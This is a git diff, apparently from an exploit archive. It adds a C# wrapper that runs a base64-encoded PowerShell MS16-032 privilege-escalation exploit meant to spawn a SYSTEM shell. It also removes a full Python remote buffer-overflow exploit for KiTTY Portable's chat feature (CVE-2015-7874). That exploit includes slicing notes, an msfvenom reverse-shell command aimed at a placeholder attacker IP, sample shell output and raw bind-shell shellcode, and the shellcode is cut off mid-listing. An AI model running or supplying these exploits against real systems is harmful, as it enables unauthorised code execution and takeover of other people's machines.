2xvc2VIYW5kbGUoSW50UHRyIGhPYmplY3QpOw0KCQkNCgkJW0RsbEltcG9ydCgia2VybmVsMzIuZGxsIiwgU2V0TGFzdEVycm9yPXRydWUpXQ0KCQlwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIER1cGxpY2F0ZUhhbmRsZSgNCgkJCUludFB0ciBoU291cmNlUHJvY2Vzc0hhbmRsZSwNCgkJCUludFB0ciBoU291cmNlSGFuZGxlLA0KCQkJSW50UHRyIGhUYXJnZXRQcm9jZXNzSGFuZGxlLA0KCQkJcmVmIEludFB0ciBscFRhcmdldEhhbmRsZSwNCgkJCWludCBkd0Rlc2lyZWRBY2Nlc3MsDQoJCQlib29sIGJJbmhlcml0SGFuZGxlLA0KCQkJaW50IGR3T3B0aW9ucyk7DQoJfQ0KCQ0KCXB1YmxpYyBzdGF0aWMgY2xhc3MgTnRkbGwNCgl7DQoJCVtEbGxJbXBvcnQoIm50ZGxsLmRsbCIsIFNldExhc3RFcnJvcj10cnVlKV0NCgkJcHVibGljIHN0YXRpYyBleHRlcm4gaW50IE50SW1wZXJzb25hdGVUaHJlYWQoDQoJCQlJbnRQdHIgVGhyZWFkSGFuZGxlLA0KCQkJSW50UHRyIFRocmVhZFRvSW1wZXJzb25hdGUsDQoJCQlyZWYgU1FPUyBTZWN1cml0eVF1YWxpdHlPZlNlcnZpY2UpOw0KCX0NCiJADQoJDQoJZnVuY3Rpb24gR2V0LVRocmVhZEhhbmRsZSB7DQoJCSMgU3RhcnR1cEluZm8gU3RydWN0DQoJCSRTdGFydHVwSW5mbyA9IE5ldy1PYmplY3QgU1RBUlRVUElORk8NCgkJJFN0YXJ0dXBJbmZvLmR3RmxhZ3MgPSAweDAwMDAwMTAwICMgU1RBUlRGX1VTRVNUREhBTkRMRVMNCgkJJFN0YXJ0dXBJbmZvLmhTdGRJbnB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQ0KCQkkU3RhcnR1cEluZm8uaFN0ZE91dHB1dCA9IFtLZXJuZWwzMl06OkdldEN1cnJlbnRUaHJlYWQoKQ0KCQkkU3RhcnR1cEluZm8uaFN0ZEVycm9yID0gW0tlcm5lbDMyXTo6R2V0Q3VycmVudFRocmVhZCgpDQoJCSRTdGFydHVwSW5mby5jYiA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OlNpemVPZigkU3RhcnR1cEluZm8pICMgU3RydWN0IFNpemUNCgkJDQoJCSMgUHJvY2Vzc0luZm8gU3RydWN0DQoJCSRQcm9jZXNzSW5mbyA9IE5ldy1PYmplY3QgUFJPQ0VTU19JTkZPUk1BVElPTg0KCQkNCgkJIyBDcmVhdGVQcm9jZXNzV2l0aExvZ29uVyAtLT4gbHBDdXJyZW50RGlyZWN0b3J5DQoJCSRHZXRDdXJyZW50UGF0aCA9IChHZXQtSXRlbSAtUGF0aCAiLlwiIC1WZXJib3NlKS5GdWxsTmFtZQ0KCQkNCgkJIyBMT0dPTl9ORVRDUkVERU5USUFMU19PTkxZIC8gQ1JFQVRFX1NVU1BFTkRFRA0KCQkkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OkNyZWF0ZVByb2Nlc3NXaXRoTG9nb25XKA0KCQkJInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLA0KCQkJMHgwMDAwMDAwMiwgIkM6XFdpbmRvd3NcU3lzdGVtMzJcY21kLmV4ZSIsICIiLA0KCQkJMHgwMDAwMDAwNCwgJG51bGwsICRHZXRDdXJyZW50UGF0aCwNCgkJCVtyZWZdJFN0YXJ0dXBJbmZvLCBbcmVmXSRQcm9jZXNzSW5mbykNCgkJDQoJCSMgRHVwbGljYXRlIGhhbmRsZSBpbnRvIGN1cnJlbnQgcHJvY2VzcyAtPiBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MNCgkJJGxwVGFyZ2V0SGFuZGxlID0gW0ludFB0cl06Olplcm8NCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpEdXBsaWNhdGVIYW5kbGUoDQoJCQkkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4NCwNCgkJCVtLZXJuZWwzMl06OkdldEN1cnJlbnRQcm9jZXNzKCksDQoJCQlbcmVmXSRscFRhcmdldEhhbmRsZSwgMCwgJGZhbHNlLA0KCQkJMHgwMDAwMDAwMikNCgkJDQoJCSMgQ2xlYW4gdXAgc3VzcGVuZGVkIHByb2Nlc3MNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpUZXJtaW5hdGVQcm9jZXNzKCRQcm9jZXNzSW5mby5oUHJvY2VzcywgMSkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpDQoJCSRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6Q2xvc2VIYW5kbGUoJFByb2Nlc3NJbmZvLmhUaHJlYWQpDQoJCQ0KCQkkbHBUYXJnZXRIYW5kbGUNCgl9DQoJDQoJZnVuY3Rpb24gR2V0LVN5c3RlbVRva2VuIHsNCgkJZWNobyAiYG5bP10gVHJ5aW5nIHRocmVhZCBoYW5kbGU6ICRUaHJlYWQiDQoJCWVjaG8gIls/XSBUaHJlYWQgYmVsb25ncyB0bzogJCgkKEdldC1Qcm9jZXNzIC1QSUQgJChbS2VybmVsMzJdOjpHZXRQcm9jZXNzSWRPZlRocmVhZCgkVGhyZWFkKSkpLlByb2Nlc3NOYW1lKSINCgkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpTdXNwZW5kVGhyZWFkKCRUaHJlYWQpDQoJCWlmICgkQ2FsbFJlc3VsdCAtbmUgMCkgew0KCQkJZWNobyAiWyFdICRUaHJlYWQgaXMgYSBiYWQgdGhyZWFkLCBtb3Zpbmcgb24uLiINCgkJCVJldHVybg0KCQl9IGVjaG8gIlsrXSBUaHJlYWQgc3VzcGVuZGVkIg0KCQkNCgkJZWNobyAiWz5dIFdpcGluZyBjdXJyZW50IGltcGVyc29uYXRpb24gdG9rZW4iDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6U2V0VGhyZWFkVG9rZW4oW3JlZl0kVGhyZWFkLCBbSW50UHRyXTo6WmVybykNCgkJaWYgKCEkQ2FsbFJlc3VsdCkgew0KCQkJZWNobyAiWyFdIFNldFRocmVhZFRva2VuIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9DQoJCQ0KCQllY2hvICJbPl0gQnVpbGRpbmcgU1lTVEVNIGltcGVyc29uYXRpb24gdG9rZW4iDQoJCSMgU2VjdXJpdHlRdWFsaXR5T2ZTZXJ2aWNlIHN0cnVjdA0KCQkkU1FPUyA9IE5ldy1PYmplY3QgU1FPUw0KCQkkU1FPUy5JbXBlcnNvbmF0aW9uTGV2ZWwgPSAyICNTZWN1cml0eUltcGVyc29uYXRpb24NCgkJJFNRT1MuTGVuZ3RoID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTUU9TKQ0KCQkjIFVuZG9jdW1lbnRlZCBBUEkncywgSSBsaWtlIHlvdXIgc3R5bGUgTWljcm9zb2Z0IDspDQoJCSRDYWxsUmVzdWx0ID0gW050ZGxsXTo6TnRJbXBlcnNvbmF0ZVRocmVhZCgkVGhyZWFkLCAkVGhyZWFkLCBbcmVmXSRzcW9zKQ0KCQlpZiAoJENhbGxSZXN1bHQgLW5lIDApIHsNCgkJCWVjaG8gIlshXSBOdEltcGVyc29uYXRlVGhyZWFkIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9DQoJDQoJCSRzY3JpcHQ6U3lzVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybw0KCQkjIDB4MDAwNiAtLT4gVE9LRU5fRFVQTElDQVRFIC1ib3IgVE9LRU5fSU1QRVJTT05BVEUNCgkJJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpPcGVuVGhyZWFkVG9rZW4oJFRocmVhZCwgMHgwMDA2LCAkZmFsc2UsIFtyZWZdJFN5c1Rva2VuSGFuZGxlKQ0KCQlpZiAoISRDYWxsUmVzdWx0KSB7DQoJCQllY2hvICJbIV0gT3BlblRocmVhZFRva2VuIGZhaWxlZCwgbW92aW5nIG9uLi4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkVGhyZWFkKQ0KCQkJZWNobyAiWytdIFRocmVhZCByZXN1bWVkISINCgkJCVJldHVybg0KCQl9DQoJCQ0KCQllY2hvICJbP10gU3VjY2Vzcywgb3BlbiBTWVNURU0gdG9rZW4gaGFuZGxlOiAkU3lzVG9rZW5IYW5kbGUiDQoJCWVjaG8gIlsrXSBSZXN1bWluZyB0aHJlYWQuLiINCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpSZXN1bWVUaHJlYWQoJFRocmVhZCkNCgl9DQoJDQoJIyBtYWluKCkgPC0tLSA7KQ0KCSRtczE2MDMyID0gQCINCgkgX18gX18gX19fIF9fXyAgIF9fXyAgICAgX19fIF9fXyBfX18gDQoJfCAgViAgfCAgX3xfICB8IHwgIF98X19ffCAgIHxfICB8XyAgfA0KCXwgICAgIHxfICB8X3wgfF98IC4gfF9fX3wgfCB8XyAgfCAgX3wNCgl8X3xffF98X19ffF9fX19ffF9fX3wgICB8X19ffF9fX3xfX198DQoJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQoJICAgICAgICAgICAgICAgW2J5IGIzM2YgLT4gQEZ1enp5U2VjXQ0KIkANCgkNCgkkbXMxNjAzMg0KCQ0KCSMgQ2hlY2sgbG9naWNhbCBwcm9jZXNzb3IgY291bnQsIHJhY2UgY29uZGl0aW9uIHJlcXVpcmVzIDIrDQoJZWNobyAiYG5bP10gT3BlcmF0aW5nIHN5c3RlbSBjb3JlIGNvdW50OiAkKFtTeXN0ZW0uRW52aXJvbm1lbnRdOjpQcm9jZXNzb3JDb3VudCkiDQoJaWYgKCQoW1N5c3RlbS5FbnZpcm9ubWVudF06OlByb2Nlc3NvckNvdW50KSAtbHQgMikgew0KCQllY2hvICJbIV0gVGhpcyBpcyBhIFZNIGlzbid0IGl0LCByYWNlIGNvbmRpdGlvbiByZXF1aXJlcyBhdCBsZWFzdCAyIENQVSBjb3JlcywgZXhpdGluZyFgbiINCgkJUmV0dXJuDQoJfQ0KCQ0KCSMgQ3JlYXRlIGFycmF5IGZvciBUaHJlYWRzICYgVElEJ3MNCgkkVGhyZWFkQXJyYXkgPSBAKCkNCgkkVGlkQXJyYXkgPSBAKCkNCgkNCgllY2hvICJbPl0gRHVwbGljYXRpbmcgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgaGFuZGxlcy4uIg0KCSMgTG9vcCBHZXQtVGhyZWFkSGFuZGxlIGFuZCBjb2xsZWN0IHRocmVhZCBoYW5kbGVzIHdpdGggYSB2YWxpZCBUSUQNCglmb3IgKCRpPTA7ICRpIC1sdCA1MDA7ICRpKyspIHsNCgkJJGhUaHJlYWQgPSBHZXQtVGhyZWFkSGFuZGxlDQoJCSRoVGhyZWFkSUQgPSBbS2VybmVsMzJdOjpHZXRUaHJlYWRJZCgkaFRocmVhZCkNCgkJIyBCaXQgaGFja3kvbGF6eSwgZmlsdGVycyBvbiB1bmlxL3ZhbGlkIFRJRCdzIHRvIGNyZWF0ZSAkVGhyZWFkQXJyYXkNCgkJaWYgKCRUaWRBcnJheSAtbm90Y29udGFpbnMgJGhUaHJlYWRJRCkgew0KCQkJJFRpZEFycmF5ICs9ICRoVGhyZWFkSUQNCgkJCWlmICgkaFRocmVhZCAtbmUgMCkgew0KCQkJCSRUaHJlYWRBcnJheSArPSAkaFRocmVhZCAjIFRoaXMgaXMgd2hhdCB3ZSBuZWVkIQ0KCQkJfQ0KCQl9DQoJfQ0KCQ0KCWlmICgkKCRUaHJlYWRBcnJheS5sZW5ndGgpIC1lcSAwKSB7DQoJCWVjaG8gIlshXSBObyB2YWxpZCB0aHJlYWQgaGFuZGxlcyB3ZXJlIGNhcHR1cmVkLCBleGl0aW5nISINCgkJUmV0dXJuDQoJfSBlbHNlIHsNCgkJZWNobyAiWz9dIERvbmUsIGdvdCAkKCRUaHJlYWRBcnJheS5sZW5ndGgpIHRocmVhZCBoYW5kbGUocykhIg0KCQllY2hvICJgbls/XSBUaHJlYWQgaGFuZGxlIGxpc3Q6Ig0KCQkkVGhyZWFkQXJyYXkNCgl9DQoJDQoJZWNobyAiYG5bKl0gU25pZmZpbmcgb3V0IHByaXZpbGVnZWQgaW1wZXJzb25hdGlvbiB0b2tlbi4uIg0KCWZvcmVhY2ggKCRUaHJlYWQgaW4gJFRocmVhZEFycmF5KXsNCgkNCgkJIyBHZXQgaGFuZGxlIHRvIFNZU1RFTSBhY2Nlc3MgdG9rZW4NCgkJR2V0LVN5c3RlbVRva2VuDQoJCQ0KCQllY2hvICJgblsqXSBTbmlmZmluZyBvdXQgU1lTVEVNIHNoZWxsLi4iDQoJCWVjaG8gImBuWz5dIER1cGxpY2F0aW5nIFNZU1RFTSB0b2tlbiINCgkJJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6RHVwbGljYXRlVG9rZW4oJFN5c1Rva2VuSGFuZGxlLCAyLCBbcmVmXSRoRHVwbGljYXRlVG9rZW5IYW5kbGUpDQoJCQ0KCQkjIFNpbXBsZSBQUyBydW5zcGFjZSBkZWZpbml0aW9uDQoJCWVjaG8gIls+XSBTdGFydGluZyB0b2tlbiByYWNlIg0KCQkkUnVuc3BhY2UgPSBbcnVuc3BhY2VmYWN0b3J5XTo6Q3JlYXRlUnVuc3BhY2UoKQ0KCQkkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpDQoJCSRTdGFydFRva2VuUmFjZS5ydW5zcGFjZSA9ICRSdW5zcGFjZQ0KCQkkUnVuc3BhY2UuT3BlbigpDQoJCVt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoew0KCQkJUGFyYW0gKCRUaHJlYWQsICRoRHVwbGljYXRlVG9rZW5IYW5kbGUpDQoJCQl3aGlsZSAoJHRydWUpIHsNCgkJCQkkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkNCgkJCX0NCgkJfSkuQWRkQXJndW1lbnQoJFRocmVhZCkuQWRkQXJndW1lbnQoJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkNCgkJJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpDQoJCQ0KCQllY2hvICJbPl0gU3RhcnRpbmcgcHJvY2VzcyByYWNlIg0KCQkjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcw0KCQkkU2FmZUd1YXJkID0gW2RpYWdub3N0aWNzLnN0b3B3YXRjaF06OlN0YXJ0TmV3KCkNCgkJd2hpbGUgKCRTYWZlR3VhcmQuRWxhcHNlZE1pbGxpc2Vjb25kcyAtbHQgMTAwMDApIHsNCgkJIyBTdGFydHVwSW5mbyBTdHJ1Y3QNCgkJJFN0YXJ0dXBJbmZvID0gTmV3LU9iamVjdCBTVEFSVFVQSU5GTw0KCQkkU3RhcnR1cEluZm8uY2IgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpTaXplT2YoJFN0YXJ0dXBJbmZvKSAjIFN0cnVjdCBTaXplDQoJCQ0KCQkjIFByb2Nlc3NJbmZvIFN0cnVjdA0KCQkkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04NCgkJDQoJCSMgQ3JlYXRlUHJvY2Vzc1dpdGhMb2dvblcgLS0+IGxwQ3VycmVudERpcmVjdG9yeQ0KCQkkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUNCgkJDQoJCSMgTE9HT05fTkVUQ1JFREVOVElBTFNfT05MWSAvIENSRUFURV9TVVNQRU5ERUQNCgkJJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygNCgkJCSJ1c2VyIiwgImRvbWFpbiIsICJwYXNzIiwNCgkJCTB4MDAwMDAwMDIsICJDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUiLCAiIiwNCgkJCTB4MDAwMDAwMDQsICRudWxsLCAkR2V0Q3VycmVudFBhdGgsDQoJCQlbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pDQoJCQkNCgkJJGhUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvDQoJCSRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkNCgkJIyBJZiB3ZSBjYW4ndCBvcGVuIHRoZSBwcm9jZXNzIHRva2VuIGl0J3MgYSBTWVNURU0gc2hlbGwhDQoJCWlmICghJENhbGxSZXN1bHQpIHsNCgkJCWVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iDQoJCQkkQ2FsbFJlc3VsdCA9IFtLZXJuZWwzMl06OlJlc3VtZVRocmVhZCgkUHJvY2Vzc0luZm8uaFRocmVhZCkNCgkJCSRTdGFydFRva2VuUmFjZS5TdG9wKCkNCgkJCSRTYWZlR3VhcmQuU3RvcCgpDQoJCQlSZXR1cm4NCgkJfQ0KCQkJDQoJCSMgQ2xlYW4gdXAgc3VzcGVuZGVkIHByb2Nlc3MNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpUZXJtaW5hdGVQcm9jZXNzKCRQcm9jZXNzSW5mby5oUHJvY2VzcywgMSkNCgkJJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpDQoJCSRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6Q2xvc2VIYW5kbGUoJFByb2Nlc3NJbmZvLmhUaHJlYWQpDQoJCX0NCgkJDQoJCSMgS2lsbCBydW5zcGFjZSAmIHN0b3B3YXRjaCBpZiBlZGdlLWNhc2UNCgkJJFN0YXJ0VG9rZW5SYWNlLlN0b3AoKQ0KCQkkU2FmZUd1YXJkLlN0b3AoKQ0KCX0NCn0="));
+
+        public void ExecuteSynchronously()
+        {
+            InitialSessionState iss = InitialSessionState.CreateDefault();
+            Runspace rs = RunspaceFactory.CreateRunspace(iss);
+            rs.Open();
+            PowerShell ps = PowerShell.Create();
+            ps.Runspace = rs;
+            ps.AddScript(PSInvoke_MS16_032);
+            ps.AddScript("Invoke-MS16-032");
+            ps.AddCommand("Out-Default");
+            ps.Invoke();
+            rs.Close();
+        }
+    }
+}
\ No newline at end of file
diff --git a/platforms/windows/remote/39119..py b/platforms/windows/remote/39119..py
deleted file mode 100755
index c4c3c674d..000000000
--- a/platforms/windows/remote/39119..py
+++ /dev/null
@@ -1,341 +0,0 @@
-# Exploit Title: KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
-# Date: 28/12/2015
-# Exploit Author: Guillaume Kaddouch
-#   Twitter: @gkweb76
-#   Blog: http://networkfilter.blogspot.com
-#   GitHub: https://github.com/gkweb76/exploits
-# Vendor Homepage: http://www.9bis.net/kitty/
-# Software Link: http://sourceforge.net/projects/portableapps/files/KiTTY%20Portable/KiTTYPortable_0.65.0.2_English.paf.exe
-# Version: 0.65.0.2p
-# Tested on: Windows XP SP3 x86 (FR), Windows 7 Pro x64 (FR), Windows 10 Pro x64 builds 10240/10586 (FR)
-# CVE: CVE-2015-7874
-# Category: Remote
-
-"""
-Disclosure Timeline:
---------------------
-2015-09-13: Vulnerability discovered
-2015-09-26: Vendor contacted
-2015-09-28: Vendor answer
-2015-10-09: KiTTY 0.65.0.3p released : unintentionally (vendor said) preventing exploit from working, without fixing the core vulnerability
-2015-12-28: exploit published
-
-Other KiTTY versions have been released since 0.65.0.3p, not related to this vulnerability. Vendor said he may release a version without chat in a future release,
-while providing an external chat DLL as a separate download.
-
-Description :
--------------
-A remote overflow exists in the KiTTY Chat feature, which enables a remote attacker to execute code on the
-vulnerable system with the rights of the current user, from Windows XP x86 to Windows 10 x64 included (builds 10240/10586).
-Chat feature is not enabled by default.
-
-WinXP -> Remote Code Execution
-Win7  -> Remote Code Execution
-Win10 -> Remote Code Execution
-
-Instructions:
--------------
-- Enable Chat feature in KiTTY portable (add "Chat=1" in kitty.ini)
-- Start KiTTY on 127.0.0.1 port 1987 (Telnet)
-- Run exploit from remote machine (Kali Linux is fine)
-
-Exploitation:
--------------
-When sending a long string to the KiTTY chat server as nickname, a crash occurs. The EIP overwrite does let little room
-for exploitation (offset 54) with no more than 160 to 196 bytes for the shellcode from XP to Windows10. Using a Metasploit 
-small shellcode such as windows/shell/reverse_ord_tcp (118 bytes encoded) makes KiTTY crashing after the first connection. 
-We control the SEH overflow, but as all DLLs are SafeSEH protected, using an address from KiTTY itself has a NULL which 
-forces us to jump backward with no extra space. We are jailed in a tight environment with little room to work with.
-
-The trick here is to slice our wanted Metasploit bind shellcode in 3 parts (350 bytes total), and send them in 3 
-successive buffers, each of them waiting in an infinite loop to not crash the process. Each buffer payload will copy 
-its shellcode slice to a stable memory location which has enough room to place a bigger shellcode. The final buffer  
-jumps to that destination memory location where our whole shellcode has been merged, to then proceed with decoding 
-and execution. This exploit is generic, which means you can even swap the shellcode included with a 850 bytes one, 
-and it will be sliced in as many buffers as necessary. This method should theoretically be usable for other 
-exploits and vulnerabilities as well.
-
-All KiTTY versions prior to 0.65.0.2p should be vulnerable, the only change is the SEH address for the POP POP RET. 
-I have successfully exploited prior versions 0.63.2.2p and 0.62.1.2p using SEH addresses I have included as comment in the exploit.
-
-Pro & Cons:
------------
-[+]: works from XP to Windows 10 as it uses addresses from the main executable
-[+]: not affected by system DEP/ASLR/SafeSEH as the main executable is not protected
-[+]: works even with small slice size below 50 bytes, instead of 118
-[-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the 
-CPU's core number. However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully.
-Also, for a bind shell payload, the connection is kept open even when closing the main program.
-[-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another 
-vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash.
-
-Graphical explanation:
----------------------
-
--------------------
--------------------
----- SHELLCODE ----
--------------------
--------------------
-
-1) Shellcode Slicer -> slice[1]
-					-> slice[2]
-					-> slice[3]
-
-2) Buffer Builder	-> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh
-					-> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh
-					-> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh
-
-															       TARGET CRASH AREA			    TARGET DST ADDR
-																-----------------------	 shell_copy --------------
-3) Slice Launcher	-> Sends buffer[1] ------------------------>| buffer[1] (thread1) |   ----->    |  slice[1]  | <-| 
-					-> Sends buffer[2] ------------------------>| buffer[2] (thread2) |   ----->    |  slice[2]  |	 |
-					-> Sends buffer[3] ------------------------>| buffer[3] (thread3) |   ----->    |  slice[3]  |   |
-																-----------------------				--------------	 |
-																				|									 |
-																				|____________________________________|
-																						jump to rebuilt shellcode
-
-guillaume@kali64:~$ ./kitty_chat.py 10.0.0.52 win10
-
-KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)
-[*] Connecting to 10.0.0.52
-[*] Sending evil buffer1... (slice 1/3)
-[*] Sending evil buffer2... (slice 2/3)
-[*] Sending evil buffer3... (slice 3/3)
-
-[*] Connecting to our shell...
-(UNKNOWN) [10.0.0.52] 4444 (?) open
-Microsoft Windows [version 10.0.10240]
-(c) 2015 Microsoft Corporation. Tous droits reserves.
-
-C:\kitty\App\KiTTY>
-
-"""
-
-import socket, os, time, sys, struct
-
-print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)"
-
-if len(sys.argv) < 3:
-        print "\nUsage: kitty_chat.py <IP> <winxp|win7|win10> [no_nc|local_nc]"
-        print "Example: kitty_chat.py 192.168.135.130 win7"
-        print "\n Optional argument:"
-        print "- 'no_nc' (no netcat), prevents the exploit from starting netcat."
-        print "Useful if you are using your own shellcode."
-        print "- 'local_nc (local netcat), binds netcat on local port 4444."
-        print "Useful if you are using a classic reverse shell shellcode."
-        sys.exit()
-
-host = sys.argv[1] # Remote target
-win  = sys.argv[2] # OS
-
-# If argument "no_nc" specified, do not start netcat at the end of the exploit
-# If argument "local_nc" specified, bind netcat to local port 4444
-# By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell)
-netcat = "remote"
-if len(sys.argv) == 4:
-        if   sys.argv[3] == "no_nc":
-                netcat = "disabled"
-        elif sys.argv[3] == "local_nc":
-                netcat = "local"
-        else:
-                print "Unknown argument: %s" % sys.argv[3]
-                sys.exit()
-
-# Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6
-relative_jump = 0x112910E8      # = 0x0006EEC6 + 0x11222222     ; avoid NULLs
-slice_size    = 118
-
-# OS buffer alignement
-# buffer length written to memory at time of crash
-if   win == "win7":
-        offset = 180
-elif win == "win10":
-        offset = 196
-elif win == "winxp":
-        offset = 160
-        slice_size = 98         # buffer smaller on XP, slice size must be reduced
-else:
-        print "Unknown OS selected: %s" % win
-        print "Please choose 'winxp', 'win7' or 'win10'"
-        sys.exit()
-
-# Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully
-# a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer
-# is the smallest. The shellcode was cut into 9 slices and worked perfectly :-) The same works of course
-# for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes  
-# (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode:
-# msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c
-
-# Metasploit Bind Shell 4444
-# Encoder: x86/fnstenv_mov
-# Bad chars: '\x00\x0a\x0d\xff'
-# Size: 350 bytes
-shellcode = (
-"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9"
-"\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1"
-"\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5"
-"\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38"
-"\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85"
-"\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21"
-"\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa"
-"\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1"
-"\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85"
-"\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97"
-"\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf"
-"\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8"
-"\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06"
-"\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd"
-"\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c"
-"\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d"
-"\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66"
-"\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e"
